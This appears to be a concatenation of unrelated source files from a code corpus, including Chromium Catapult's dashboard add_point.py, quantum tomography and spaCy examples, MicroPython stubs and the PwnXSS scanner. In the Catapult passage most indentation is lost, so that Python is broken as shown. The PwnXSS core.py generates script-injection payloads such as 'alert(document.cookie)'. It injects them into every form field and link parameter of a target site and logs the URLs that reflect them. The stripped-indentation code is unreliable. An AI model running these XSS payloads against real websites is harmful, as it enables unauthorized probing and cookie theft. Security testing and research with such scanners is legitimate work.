chart_name = chart_name + '/' + tir_label
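    # Illustrative: a chart named 'cold@@load_time' becomes 'load_time/cold'.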
value, error = _ExtractValueAndError(trace)
# If there is a link to an about:tracing trace in cloud storage for this
# test trace_name, cache it.
tracing_uri = None
if (tracing_links and
trace_name in tracing_links and
'cloud_url' in tracing_links[trace_name]):
tracing_uri = tracing_links[trace_name]['cloud_url'].replace('\\/', '/')
trace_name = _EscapeName(trace_name)
if trace_name == 'summary':
subtest_name = chart_name
else:
subtest_name = chart_name + '/' + trace_name
name = test_suite_name + '/' + subtest_name
if trace_name == 'summary' and is_ref:
name += '/ref'
elif trace_name != 'summary' and is_ref:
name += '_ref'
row_dict = {
'test': name,
'value': value,
'error': error,
'units': trace['units'],
'tracing_uri': tracing_uri,
'benchmark_description': benchmark_description,
}
if 'improvement_direction' in trace:
improvement_direction_str = trace['improvement_direction']
if improvement_direction_str is None:
raise BadRequestError('improvement_direction must not be None')
row_dict['higher_is_better'] = _ImprovementDirectionToHigherIsBetter(
improvement_direction_str)
return row_dict
def _ExtractValueAndError(trace):
"""Returns the value and measure of error from a chartjson trace dict.
Args:
trace: A dict that has one "result" from a performance test, e.g. one
"value" in a Telemetry test, with the keys "trace_type", "value", etc.
Returns:
A pair (value, error) where |value| is a float and |error| is some measure
of variance used to show error bars; |error| could be None.
Raises:
BadRequestError: Data format was invalid.
"""
trace_type = trace.get('type')
if trace_type == 'scalar':
value = trace.get('value')
if value is None and trace.get('none_value_reason'):
return float('nan'), 0
try:
return float(value), 0
except:
raise BadRequestError('Expected scalar value, got: %r' % value)
if trace_type == 'list_of_scalar_values':
values = trace.get('values')
if not isinstance(values, list) and values is not None:
# Something else (such as a single scalar, or string) was given.
raise BadRequestError('Expected list of scalar values, got: %r' % values)
if not values or None in values:
# None was included or values is None; this is not an error if there
# is a reason.
if trace.get('none_value_reason'):
return float('nan'), float('nan')
raise BadRequestError('Expected list of scalar values, got: %r' % values)
if not all(_IsNumber(v) for v in values):
raise BadRequestError('Non-number found in values list: %r' % values)
value = math_utils.Mean(values)
std = trace.get('std')
if std is not None:
error = std
else:
error = math_utils.StandardDeviation(values)
return value, error
if trace_type == 'histogram':
return _GeomMeanAndStdDevFromHistogram(trace)
raise BadRequestError('Invalid value type in chart object: %r' % trace_type)
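# Example (illustrative):
#   _ExtractValueAndError({'type': 'scalar', 'value': 4.2}) returns (4.2, 0);
#   a 'list_of_scalar_values' trace returns (mean, std or sample std dev).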
def _IsNumber(v):
return isinstance(v, float) or isinstance(v, int) or isinstance(v, long)
def _EscapeName(name):
"""Escapes a trace name so it can be stored in a row.
Args:
name: A string representing a name.
Returns:
An escaped version of the name.
"""
return re.sub(r'[\:|=/#&,]', '_', name)
def _GeomMeanAndStdDevFromHistogram(histogram):
"""Generates the geom. mean and std. dev. for a histogram.
A histogram is a collection of numerical buckets with associated
  counts; a bucket can represent either a number of instances of a single
  value ('low'), or a number of instances within a range of values (in
  which case 'high' specifies the upper bound). We compute the statistics
  by treating the
histogram analogously to a list of individual values, where the counts tell
us how many of each value there are.
Args:
histogram: A histogram dict with a list 'buckets' of buckets.
Returns:
The geometric mean and standard deviation of the given histogram.
"""
  # Note: This code comes originally from
  # build/scripts/common/chromium_utils.py, where it was used for
  # processing histogram results on the buildbot side.
if 'buckets' not in histogram:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return 0.0, 0.0
count = 0
sum_of_logs = 0
for bucket in histogram['buckets']:
if 'high' in bucket:
bucket['mean'] = (bucket['low'] + bucket['high']) / 2.0
else:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
bucket['mean'] = bucket['low']
if bucket['mean'] > 0:
sum_of_logs += math.log(bucket['mean']) * bucket['count']
count += bucket['count']
if count == 0:
return 0.0, 0.0
sum_of_squares = 0
geom_mean = math.exp(sum_of_logs / count)
for bucket in histogram['buckets']:
if bucket['mean'] > 0:
sum_of_squares += (bucket['mean'] - geom_mean) ** 2 * bucket['count']
return geom_mean, math.sqrt(sum_of_squares / count)
def _ImprovementDirectionToHigherIsBetter(improvement_direction_str):
"""Converts an improvement direction string to a higher_is_better boolean.
Args:
improvement_direction_str: a string, either 'up' or 'down'.
Returns:
A boolean expressing the appropriate higher_is_better value.
Raises:
BadRequestError: if improvement_direction_str is invalid.
"""
# If improvement_direction is provided, we want to use it. Otherwise, by not
# providing it we'll fall back to unit-info.json
# TODO(eakuefner): Fail instead of falling back after fixing crbug.com/459450.
if improvement_direction_str == 'up':
return True
elif improvement_direction_str == 'down':
return False
else:
raise BadRequestError('Invalid improvement direction string: ' +
improvement_direction_str)
def _ConstructTestPathMap(row_dicts):
"""Makes a mapping from test paths to last added revision."""
last_added_revision_keys = []
for row in row_dicts:
if not ('master' in row and 'bot' in row and 'test' in row):
continue
path = '%s/%s/%s' % (row['master'], row['bot'], row['test'].strip('/'))
if len(path) > _MAX_TEST_PATH_LENGTH:
continue
last_added_revision_keys.append(ndb.Key('LastAddedRevision', path))
try:
last_added_revision_entities = ndb.get_multi(last_added_revision_keys)
except datastore_errors.BadRequestError:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
logging.warn('Datastore BadRequestError when getting %s',
repr(last_added_revision_keys))
return {}
return {r.key.string_id(): r.revision
for r in last_added_revision_entities if r is not None}
def _ValidateRowDict(row, test_map):
"""Checks all fields in the input dictionary.
Args:
row: A dictionary which represents one point.
test_map: A dictionary mapping test paths to last added revision.
Raises:
BadRequestError: The input was not valid.
"""
required_fields = ['master', 'bot', 'test']
for field in required_fields:
if field not in row:
raise BadRequestError('No "%s" field in row dict.' % field)
_ValidateMasterBotTest(row['master'], row['bot'], row['test'])
_ValidateRowId(row, test_map)
GetAndValidateRowProperties(row)
def _ValidateMasterBotTest(master, bot, test):
"""Validates the master, bot, and test properties of a row dict."""
# Trailing and leading slashes in the test name are ignored.
# The test name must consist of at least a test suite plus sub-test.
test = test.strip('/')
if '/' not in test:
raise BadRequestError('Test name must have more than one part.')
if len(test.split('/')) > graph_data.MAX_TEST_ANCESTORS:
raise BadRequestError('Invalid test name: %s' % test)
# The master and bot names have just one part.
if '/' in master or '/' in bot:
raise BadRequestError('Illegal slash in master or bot name.')
_ValidateTestPath('%s/%s/%s' % (master, bot, test))
def _ValidateTestPath(test_path):
"""Checks whether all the parts of the test path are valid."""
# A test with a test path length over the max key length shouldn't be
# created, since the test path is used in TestContainer keys.
if len(test_path) > _MAX_TEST_PATH_LENGTH:
raise BadRequestError('Test path too long: %s' % test_path)
# Stars are reserved for test path patterns, so they can't be used in names.
if '*' in test_path:
raise BadRequestError('Illegal asterisk in test name.')
for name in test_path.split('/'):
_ValidateTestPathPartName(name)
def _ValidateTestPathPartName(name):
"""Checks whether a Master, Bot or TestMetadata name is OK."""
  # NDB Datastore doesn't allow key names that both start and end with "__".
if name.startswith('__') and name.endswith('__'):
raise BadRequestError(
'Invalid name: "%s". Names cannot start and end with "__".' % name)
def _ValidateRowId(row_dict, test_map):
"""Checks whether the ID for a Row is OK.
Args:
row_dict: A dictionary with new point properties, including "revision".
test_map: A dictionary mapping test paths to the last previously added
revision for each test.
Raises:
BadRequestError: The revision is not acceptable for some reason.
"""
row_id = GetAndValidateRowId(row_dict)
# Get the last added revision number for this test.
master, bot, test = row_dict['master'], row_dict['bot'], row_dict['test']
test_path = '%s/%s/%s' % (master, bot, test)
last_row_id = test_map.get(test_path)
if not last_row_id:
# Could be first point in test.
logging.warning('Test %s has no last added revision entry.', test_path)
return
allow_jump = (
master.endswith('Internal') or
(master.endswith('QA') and bot.startswith('release-tests-')))
if not _IsAcceptableRowId(row_id, last_row_id, allow_jump=allow_jump):
raise BadRequestError(
'Invalid ID (revision) %d; compared to previous ID %s, it was larger '
'or smaller by too much.' % (row_id, last_row_id))
def _IsAcceptableRowId(row_id, last_row_id, allow_jump=False):
"""Checks whether the given row id (aka revision) is not too large or small.
For each data series (i.e. TestMetadata entity), we assume that row IDs are
monotonically increasing. On a given chart, points are sorted by these
row IDs. This way, points can arrive out of order but still be shown
correctly in the chart.
However, sometimes a bot might start to use a different *type* of row ID;
for example it might change from revision numbers or build numbers to
timestamps, or from timestamps to build numbers. This causes a lot of
problems, including points being put out of order.
If a sender of data actually wants to switch to a different type of
row ID, it would be much cleaner for them to start sending it under a new
chart name.
Args:
    row_id: The proposed Row entity id (usually sent as "revision").
    last_row_id: The previous Row id, or None if there was no previous row.
    allow_jump: Whether to allow a one-off jump to a much larger row id, used
        for special-cased bots migrating from commit positions to timestamps.
Returns:
True if acceptable, False otherwise.
"""
if last_row_id is None:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return True
if row_id <= 0:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return False
# Too big of a decrease.
if row_id < 0.5 * last_row_id:
return False
# TODO(perezju): We temporarily allow for a big jump on special cased bots,
# while we migrate from using commit position to timestamp as row id.
# The jump is only allowed into a timestamp falling within Aug-Dec 2016.
# This special casing should be removed after finishing the migration.
if allow_jump and 1470009600 < row_id < 1483228800:
return True
# Too big of an increase.
if row_id > 2 * last_row_id:
return False
return True
def GetAndValidateRowId(row_dict):
"""Returns the integer ID for a new Row.
This method is also responsible for validating the input fields related
to making the new row ID.
Args:
row_dict: A dictionary obtained from the input JSON.
Returns:
An integer row ID.
Raises:
BadRequestError: The input wasn't formatted properly.
"""
if 'revision' not in row_dict:
raise BadRequestError('Required field "revision" missing.')
try:
return int(row_dict['revision'])
except (ValueError, TypeError):
raise BadRequestError('Bad value for "revision", should be numerical.')
def GetAndValidateRowProperties(row):
"""From the object received, make a dictionary of properties for a Row.
This includes the default "value" and "error" columns as well as all
supplemental columns, but it doesn't include "revision", and it doesn't
include input fields that are properties of the parent TestMetadata, such as
"units".
This method is responsible for validating all properties that are to be
properties of the new Row.
Args:
row: A dictionary obtained from the input JSON.
Returns:
A dictionary of the properties and property values to set when creating
a Row. This will include "value" and "error" as well as all supplemental
columns.
Raises:
BadRequestError: The properties weren't formatted correctly.
"""
columns = {}
# Value and error must be floating point numbers.
if 'value' not in row:
raise BadRequestError('No "value" given.')
try:
columns['value'] = float(row['value'])
except (ValueError, TypeError):
raise BadRequestError('Bad value for "value", should be numerical.')
if 'error' in row:
try:
error = float(row['error'])
columns['error'] = error
except (ValueError, TypeError):
logging.warn('Bad value for "error".')
columns.update(_GetSupplementalColumns(row))
return columns
def _GetSupplementalColumns(row):
"""Gets a dict of supplemental columns.
If any columns are invalid, a warning is logged and they just aren't included,
but no exception is raised.
Individual rows may specify up to _MAX_NUM_COLUMNS extra data, revision,
and annotation columns. These columns must follow formatting rules for
their type. Invalid columns are dropped with an error log, but the valid
data will still be graphed.
Args:
row: A dict, possibly with the key "supplemental_columns", the value of
which should be a dict.
Returns:
A dict of valid supplemental columns.
"""
columns = {}
for (name, value) in row.get('supplemental_columns', {}).iteritems():
# Don't allow too many columns
if len(columns) == _MAX_NUM_COLUMNS:
logging.warn('Too many columns, some being dropped.')
break
value = _CheckSupplementalColumn(name, value)
if value:
columns[name] = value
return columns
def _CheckSupplementalColumn(name, value):
"""Returns a possibly modified value for a supplemental column, or None."""
# Check length of column name.
name = str(name)
if len(name) > _MAX_COLUMN_NAME_LENGTH:
logging.warn('Supplemental column name too long.')
return None
# The column name has a prefix which indicates type of value.
if name[:2] not in ('d_', 'r_', 'a_'):
logging.warn('Bad column name "%s", invalid prefix.', name)
return None
# The d_ prefix means "data column", intended to hold numbers.
if name.startswith('d_'):
try:
value = float(value)
except (ValueError, TypeError):
logging.warn('Bad value for column "%s", should be numerical.', name)
return None
# The r_ prefix means "revision", and the value should look like a number,
# a version number, or a git commit hash.
if name.startswith('r_'):
    revision_patterns = [
        r'^\d+$',  # A plain revision or build number.
        r'^\d+\.\d+\.\d+\.\d+$',  # A four-part version number.
        r'^[A-Fa-f0-9]{40}$',  # A full git commit hash.
    ]
if (not value or len(str(value)) > _STRING_COLUMN_MAX_LENGTH or
not any(re.match(p, str(value)) for p in revision_patterns)):
logging.warn('Bad value for revision column "%s".', name)
return None
value = str(value)
if name.startswith('a_'):
# Annotation column, should be a short string.
if len(str(value)) > _STRING_COLUMN_MAX_LENGTH:
logging.warn('Value for "%s" too long, max length is %d.',
name, _STRING_COLUMN_MAX_LENGTH)
return None
return value
| 34.455206 | 80 | 0.693921 | [
"BSD-3-Clause"
] | bopopescu/catapult-2 | dashboard/dashboard/add_point.py | 28,460 | Python |
import spacy
# Load the zh_core_web_md pipeline
nlp = spacy.load("zh_core_web_md")
# Process the text
doc = nlp("两只老虎跑得快")
for token in doc:
print(token.text)
# Get the vector for the token "老虎"
laohu_vector = doc[2].vector
print(laohu_vector)
| 13.6 | 34 | 0.720588 | [
"MIT"
] | admariner/spacy-course | exercises/zh/solution_02_09.py | 252 | Python |
'''
Second example calculation from:
Smart, S. E., & Mazziotti, D. A. (2021). Lowering tomography costs in quantum simulation
with a symmetry projected operator basis. Physical Review A, 103(1), 012420.
https://doi.org/10.1103/PhysRevA.103.012420
Here we simulate a noisy quantum system using a tunable noise model obtained from an actual quantum device, and compare the tomography of the 2-RDM under the default and symmetry-projected techniques with the ideal 2-RDM.
'''
import numpy as np
import sys
from math import pi
import qiskit.providers.aer.noise as noise
from noise_model.deconstruct import *
from hqca.hamiltonian import *
from hqca.instructions import *
from hqca.processes import *
from hqca.acse import *
from hqca.core import *
from hqca.core.primitives import *
from pyscf import gto
from hqca.transforms import *
from functools import partial
from hqca.tools import *
from hqca.state_tomography import *
np.set_printoptions(precision=3)
import qiskit
class Ins(Instructions):
def __init__(self,coeff):
self._gates =[[(coeff,),self._test]]
def _test(self,Q,coeff):
Q.si(0)
Q.Cx(1,0)
Q.Cx(2,1)
Q.Cx(3,2)
Q.Rx(3,coeff[0])
Q.Rx(1,coeff[1])
Q.Cx(3,2)
Q.Cx(2,1)
Q.Cx(1,0)
Q.Cx(3,2)
Q.Ry(3,coeff[2])
Q.Cx(3,2)
Q.s(0)
@property
def gates(self):
return self._gates
@gates.setter
def gates(self,a):
self._gates = a
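# split_matrix: separate a 2-RDM matrix into blocks by how many distinct
# orbital indices (p, q, r, s) each element involves: two distinct indices
# (nn), three (ne), and four (ee).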
def split_matrix(rdm):
N = rdm.rdm.shape[0]
R = int(np.sqrt(N))
nn = np.zeros(rdm.rdm.shape,dtype=np.complex_)
ne = np.zeros(rdm.rdm.shape,dtype=np.complex_)
ee = np.zeros(rdm.rdm.shape,dtype=np.complex_)
for i in range(N):
p,r = i//R,i%R
for j in range(N):
q,s = j//R,j%R
ind = tuple([p,q,r,s])
if len(set(ind))==2:
nn[i,j]=rdm.rdm[i,j]
elif len(set(ind))==3:
ne[i,j]=rdm.rdm[i,j]
elif len(set(ind))==4:
ee[i,j]=rdm.rdm[i,j]
return nn,ne,ee
n = 0
# generate mol object
mol = gto.Mole()
mol.atom=[['H',(0,0,0)],['H',(2.0,0,0)]]
mol.basis='sto-3g'
mol.spin=0
mol.build()
N = []
eig = []
norm = []
ham = MolecularHamiltonian(mol,transform=JordanWigner)
st = StorageACSE(ham)
qs = QuantumStorage()
qs0 = QuantumStorage()
pr = StandardProcess()
qs0.set_algorithm(st)
# set Nq, number of shots, and error strength
Nq = 4
Ns = 8192
error = 0.0
# qs0, ideal
# qs, noisy simulated
qs0.set_backend(
backend='statevector_simulator',
Nq=Nq,
Nq_ancilla=0,
num_shots=Ns,
provider='Aer')
qs.set_algorithm(st)
# can specify provider='IBMQ' and an appropriate backend if desired
qs.set_backend(
backend='qasm_simulator',
Nq=Nq,
num_shots=Ns,
provider='Aer')
nm = model_v2(scaling=error,name='./noise_model/110220_ibmq_bogota')
qs.set_noise_model(custom=True,
noise_model=nm)
tomo = []
tomo_sim = []
coefficients = np.load('./noise_model/coefficients.npy')
# runs the tomography in sets of 5...suited for particular constraints on quantum device access
# but can be easily modified
for q in range(5):
coeffs = coefficients[q*5:q*5+5,:]
for coeff in coeffs:
print(coeff)
# run 1
tomo0 = StandardTomography(qs0,verbose=False)
tomo0.generate(real=True,imag=True,
simplify=True,transform=JordanWigner,
method='gt',strategy='lf')
ins0 = Ins(coeff)
tomo0.set(ins0)
tomo1 = StandardTomography(qs,verbose=False)
tomo1.generate(real=True,imag=True,
simplify=True,transform=JordanWigner,
method='gt',strategy='lf')
ins = Ins(coeff)
tomo1.set(ins)
tomo2 = ReducedTomography(qs,verbose=False)
tomo2.generate(real=True,imag=True,
simplify=True,transform=JordanWigner,
method='gt',strategy='lf')
ins = Ins(coeff)
tomo2.set(ins)
tomo_sim.append(tomo0)
tomo.append(tomo1)
tomo.append(tomo2)
run_multiple(tomo[q*10:(q*10+10)],qs)
run_multiple(tomo_sim[q*5:(q*5+5)],qs0)
for item in tomo:
print(item.counts['ZZZZ'])
print('Constructing..')
for t in tomo:
t.construct(processor=pr)
for t in tomo_sim:
t.construct(processor=pr)
for i in range(len(coefficients)):
print(coefficients[i,:])
tomo0 = tomo_sim[i]
tomo1 = tomo[i*2]
tomo2 = tomo[i*2+1]
st.analysis(tomo0.rdm)
st.analysis(tomo1.rdm)
st.analysis(tomo2.rdm)
tomo0.rdm.contract()
tomo1.rdm.contract()
tomo2.rdm.contract()
e0 = np.linalg.eigvalsh(tomo0.rdm.rdm)
e1 = np.linalg.eigvalsh(tomo1.rdm.rdm)
e2 = np.linalg.eigvalsh(tomo2.rdm.rdm)
d01 = tomo0.rdm-tomo1.rdm
d02 = tomo0.rdm-tomo2.rdm
d12 = tomo1.rdm-tomo2.rdm
d01.contract()
d12.contract()
d02.contract()
N01 = np.linalg.norm(d01.rdm,ord='fro')
N02 = np.linalg.norm(d02.rdm,ord='fro')
N12 = np.linalg.norm(d12.rdm,ord='fro')
print('Difference D0-D1: {}'.format(N01))
print('Difference D0-D2: {}'.format(N02))
print('Difference D1-D2: {}'.format(N12))
norm.append([N01,N02,N12])
print('--- --- --- --- --- ---')
print('Frombenius norm of D01, D02, and D12 for each run')
norm = np.asmatrix(norm)
print(norm)
print('--- --- --- --- --- ---')
print(' average (std dev)')
for i,l in zip(range(norm.shape[1]),['D01','D02','D12']):
print('{}: {:.6f} {:.6f}'.format(l,np.average(norm[:,i]),np.std(norm[:,i])))
| 28.170854 | 229 | 0.616482 | [
"Apache-2.0"
] | damazz/HQCA | examples/r2021_pra_tomography/02_pra_example_2.py | 5,606 | Python |
from lib.helper.helper import *
from random import randint
from bs4 import BeautifulSoup
from urllib.parse import urljoin,urlparse,parse_qs,urlencode
from lib.helper.Log import *
class core:
@classmethod
def generate(self,eff):
FUNCTION=[
"prompt(5000/200)",
"alert(6000/3000)",
"alert(document.cookie)",
"prompt(document.cookie)",
"console.log(5000/3000)"
]
if eff == 1:
return "<script/>"+FUNCTION[randint(0,4)]+"<\script\>"
elif eff == 2:
return "<\script/>"+FUNCTION[randint(0,4)]+"<\\script>"
elif eff == 3:
return "<\script\> "+FUNCTION[randint(0,4)]+"<//script>"
elif eff == 4:
return "<script>"+FUNCTION[randint(0,4)]+"<\script/>"
elif eff == 5:
return "<script>"+FUNCTION[randint(0,4)]+"<//script>"
elif eff == 6:
return "<script>"+FUNCTION[randint(0,4)]+"</script>"
@classmethod
def post_method(self):
bsObj=BeautifulSoup(self.body,"html.parser")
forms=bsObj.find_all("form",method=True)
for form in forms:
try:
action=form["action"]
except KeyError:
action=self.url
if form["method"].lower().strip() == "post":
Log.warning("Target have form with POST method: "+C+urljoin(self.url,action))
Log.info("Collecting form input key.....")
keys={}
for key in form.find_all(["input","textarea"]):
try:
if key["type"] == "submit":
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"<Submit Confirm>")
keys.update({key["name"]:key["name"]})
else:
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
keys.update({key["name"]:self.payload})
except Exception as e:
Log.info("Internal error: "+str(e))
Log.info("Sending payload (POST) method...")
req=self.session.post(urljoin(self.url,action),data=keys)
if self.payload in req.text:
Log.high("Detected XSS (POST) at "+urljoin(self.url,req.url))
file = open("xss.txt", "a")
file.write(str(req.url)+"\n\n")
file.close()
Log.high("Post data: "+str(keys))
else:
Log.info("Parameter page using (POST) payloads but not 100% yet...")
@classmethod
def get_method_form(self):
bsObj=BeautifulSoup(self.body,"html.parser")
forms=bsObj.find_all("form",method=True)
for form in forms:
try:
action=form["action"]
except KeyError:
action=self.url
if form["method"].lower().strip() == "get":
Log.warning("Target have form with GET method: "+C+urljoin(self.url,action))
Log.info("Collecting form input key.....")
keys={}
for key in form.find_all(["input","textarea"]):
try:
if key["type"] == "submit":
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"<Submit Confirm>")
keys.update({key["name"]:key["name"]})
else:
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
keys.update({key["name"]:self.payload})
except Exception as e:
Log.info("Internal error: "+str(e))
try:
Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
keys.update({key["name"]:self.payload})
except KeyError as e:
Log.info("Internal error: "+str(e))
Log.info("Sending payload (GET) method...")
req=self.session.get(urljoin(self.url,action),params=keys)
if self.payload in req.text:
Log.high("Detected XSS (GET) at "+urljoin(self.url,req.url))
file = open("xss.txt", "a")
file.write(str(req.url)+"\n\n")
file.close()
Log.high("GET data: "+str(keys))
else:
Log.info("\033[0;35;47m Parameter page using (GET) payloads but not 100% yet...")
@classmethod
def get_method(self):
bsObj=BeautifulSoup(self.body,"html.parser")
links=bsObj.find_all("a",href=True)
for a in links:
url=a["href"]
if url.startswith("http://") is False or url.startswith("https://") is False or url.startswith("mailto:") is False:
base=urljoin(self.url,a["href"])
query=urlparse(base).query
if query != "":
Log.warning("Found link with query: "+G+query+N+" Maybe a vuln XSS point")
query_payload=query.replace(query[query.find("=")+1:len(query)],self.payload,1)
test=base.replace(query,query_payload,1)
query_all=base.replace(query,urlencode({x: self.payload for x in parse_qs(query)}))
Log.info("Query (GET) : "+test)
Log.info("Query (GET) : "+query_all)
_respon=self.session.get(test)
if self.payload in _respon.text or self.payload in self.session.get(query_all).text:
Log.high("Detected XSS (GET) at "+_respon.url)
file = open("xss.txt", "a")
file.write(str(_respon.url)+"\n\n")
file.close()
else:
Log.info("Parameter page using (GET) payloads but not 100% yet...")
@classmethod
def main(self,url,proxy,headers,payload,cookie,method=2):
print(W+"*"*15)
self.payload=payload
self.url=url
self.session=session(proxy,headers,cookie)
Log.info("Checking connection to: "+Y+url)
try:
ctr=self.session.get(url)
self.body=ctr.text
except Exception as e:
Log.high("Internal error: "+str(e))
return
if ctr.status_code > 400:
Log.info("Connection failed "+G+str(ctr.status_code))
return
else:
Log.info("Connection estabilished "+G+str(ctr.status_code))
if method >= 2:
self.post_method()
self.get_method()
self.get_method_form()
elif method == 1:
self.post_method()
elif method == 0:
self.get_method()
self.get_method_form()
| 30.125 | 118 | 0.617716 | [
"MIT"
] | MohamedTarekq/PwnXSS | lib/core.py | 5,543 | Python |
# ----------------------------------------------------------------------------
# Imports:
# ----------------------------------------------------------------------------
from dpa.action import Action, ActionError
from dpa.ptask.action.sync import _PTaskSyncAction
from dpa.location import current_location_code
from dpa.shell.output import Style
# ----------------------------------------------------------------------------
# Classes:
# ----------------------------------------------------------------------------
class PTaskSourceAction(_PTaskSyncAction):
"""Source the contents of one ptask into another."""
# ------------------------------------------------------------------------
def execute(self):
try:
super(PTaskSourceAction, self).execute()
except ActionError as e:
raise ActionError("Unable to source ptask: " + str(e))
else:
print "\nSuccessfully sourced: ",
if self.source_version:
print Style.bright + str(self.source_version.spec) + \
Style.reset + "\n"
else:
print Style.bright + str(self.source.spec) + " [latest]" + \
Style.reset + "\n"
# ------------------------------------------------------------------------
def validate(self):
super(PTaskSourceAction, self).validate()
# ---- make sure the destination location is the current location.
cur_loc_code = current_location_code()
if self.destination_version:
dest_loc_code = self.destination_version.location_code
else:
dest_loc_code = self.destination_latest_version.location_code
if cur_loc_code != dest_loc_code:
raise ActionError("Destination location must be this location.")
| 36.4 | 78 | 0.467582 | [
"MIT"
] | Clemson-DPA/dpa-pipe | dpa/ptask/action/source.py | 1,820 | Python |
import os
import csv, json
from collections import defaultdict
from expertise.evaluators.mean_avg_precision import eval_map
from expertise.evaluators.hits_at_k import eval_hits_at_k
from expertise.dataset import Dataset
from expertise import utils
import ipdb
def setup(config):
assert os.path.exists(config.tpms_scores_file), 'This model requires a pre-computed tpms score file.'
dataset = Dataset(**config.dataset)
experiment_dir = os.path.abspath(config.experiment_dir)
setup_dir = os.path.join(experiment_dir, 'setup')
if not os.path.exists(setup_dir):
os.mkdir(setup_dir)
(train_set_ids,
dev_set_ids,
test_set_ids) = utils.split_ids(list(dataset.submission_ids), seed=config.random_seed)
bids_by_forum = utils.get_bids_by_forum(dataset)
test_labels = utils.format_bid_labels(test_set_ids, bids_by_forum)
utils.dump_jsonl(os.path.join(config.setup_dir, 'test_labels.jsonl'), test_labels)
def train(config):
print('Nothing to train. This model is a shell that reads in pre-computed TPMS scores.')
assert os.path.exists(config.tpms_scores_file), 'This model requires a pre-computed tpms score file.'
def infer(config):
print('Nothing to infer. This model is a shell that reads in pre-computed TPMS scores.')
assert os.path.exists(config.tpms_scores_file), 'This model requires a pre-computed tpms score file.'
def test(config):
score_file_path = os.path.join(config.test_dir, 'test_scores.jsonl')
labels_file_path = os.path.join(config.setup_dir, 'test_labels.jsonl')
tpms_scores_file = config.tpms_scores_file
scores = {}
for data in utils.jsonl_reader(tpms_scores_file):
source_id = data['source_id']
target_id = data['target_id']
score = data['score']
if source_id not in scores:
scores[source_id] = {}
if target_id not in scores[source_id]:
scores[source_id][target_id] = score
with open(score_file_path, 'w') as w:
for data in utils.jsonl_reader(labels_file_path):
paperid = data['source_id']
userid = data['target_id']
label = data['label']
if paperid in scores:
score = scores[paperid].get(userid, 0.0)
if float(score) > -float('inf'):
result = {
'source_id': paperid,
'target_id': userid,
'score': float(score),
'label': int(label)
}
w.write(json.dumps(result) + '\n')
(list_of_list_of_labels,
list_of_list_of_scores) = utils.load_labels(score_file_path)
map_score = float(eval_map(list_of_list_of_labels, list_of_list_of_scores))
hits_at_1 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=1))
hits_at_3 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=3))
hits_at_5 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=5))
hits_at_10 = float(eval_hits_at_k(list_of_list_of_labels, list_of_list_of_scores, k=10))
score_lines = [
[config.name, text, data] for text, data in [
('MAP', map_score),
('Hits@1', hits_at_1),
('Hits@3', hits_at_3),
('Hits@5', hits_at_5),
('Hits@10', hits_at_10)
]
]
config.test_save(score_lines, 'test.scores.tsv')
| 36.052083 | 105 | 0.664259 | [
"MIT"
] | iesl/openreview-expertise | expertise/models/tpms/tpms.py | 3,461 | Python |
"""
Module: 'collections' on esp32 1.11.0
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11 on 2019-05-29', machine='ESP32 module with ESP32')
# Stubber: 1.3.2
class OrderedDict:
''
def clear():
pass
def copy():
pass
def fromkeys():
pass
def get():
pass
def items():
pass
def keys():
pass
def pop():
pass
def popitem():
pass
def setdefault():
pass
def update():
pass
def values():
pass
class deque:
''
def append():
pass
def popleft():
pass
def namedtuple():
pass
| 12.555556 | 126 | 0.49115 | [
"MIT"
] | AssimilatedGuy/micropython-stubs | stubs/micropython-esp32-1_11/collections.py | 678 | Python |
from kivy.app import App
from kivy.uix.label import Label
class ChildApp(App):
def build(self):
return Label(text='Child')
if __name__ == '__main__':
ChildApp().run()
| 16.909091 | 34 | 0.666667 | [
"MIT"
] | hirossan4049/Schreen | tests/twokivys2.py | 186 | Python |
import os
import time
import lcd
from Maix import GPIO
from board import board_info
from fpioa_manager import fm
# import uos
S_IFDIR = 0o040000 # directory
# noinspection PyPep8Naming
def S_IFMT(mode):
"""Return the portion of the file's mode that describes the
file type.
"""
return mode & 0o170000
# noinspection PyPep8Naming
def S_ISDIR(mode):
"""Return True if mode is from a directory."""
return S_IFMT(mode) == S_IFDIR
def sizeof_fmt(num, suffix='B'):
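    # Human-readable byte sizes, e.g. sizeof_fmt(2048) -> '2.0KB' and
    # sizeof_fmt(5) -> '5.0B'.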
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
class ExplorerApp:
def __init__(self):
self.current_offset = 0
self.current_selected_index = 0
self.__initialized = False
        self.is_dirty = True
def __lazy_init(self):
self.current_dir_files = os.listdir("/sd/")
print(self.current_dir_files)
self.__initialized = True
def on_top_button_changed(self, state):
if state == "pressed":
print("pressed")
self.current_selected_index += 1
if self.current_selected_index >= len(self.current_dir_files):
self.current_selected_index = 0
if self.current_selected_index >= 7:
self.current_offset = self.current_selected_index - 6
else:
self.current_offset = 0
print("current_selected=", self.current_selected_index,
"current_offset=", self.current_offset)
self.is_dirty = True
def on_draw(self):
self.is_dirty = False
if not self.__initialized:
self.__lazy_init()
x_offset = 4
y_offset = 6
lcd.clear()
for i in range(self.current_offset, len(self.current_dir_files)):
# gc.collect()
file_name = self.current_dir_files[i]
print(file_name)
try:
f_stat = os.stat('/sd/' + file_name)
if S_ISDIR(f_stat[0]):
file_name = file_name + '/'
# gc.collect()
file_readable_size = sizeof_fmt(f_stat[6])
lcd.draw_string(lcd.width() - 50, y_offset,
file_readable_size, lcd.WHITE, lcd.BLUE)
except Exception as e:
print("-------------------->", e)
is_current = self.current_selected_index == i
line = "%s %d %s" % ("->" if is_current else " ", i, file_name)
lcd.draw_string(x_offset, y_offset, line, lcd.WHITE, lcd.RED)
# gc.collect()
y_offset += 18
if y_offset > lcd.height():
print(y_offset, lcd.height(), "y_offset > height(), break")
break
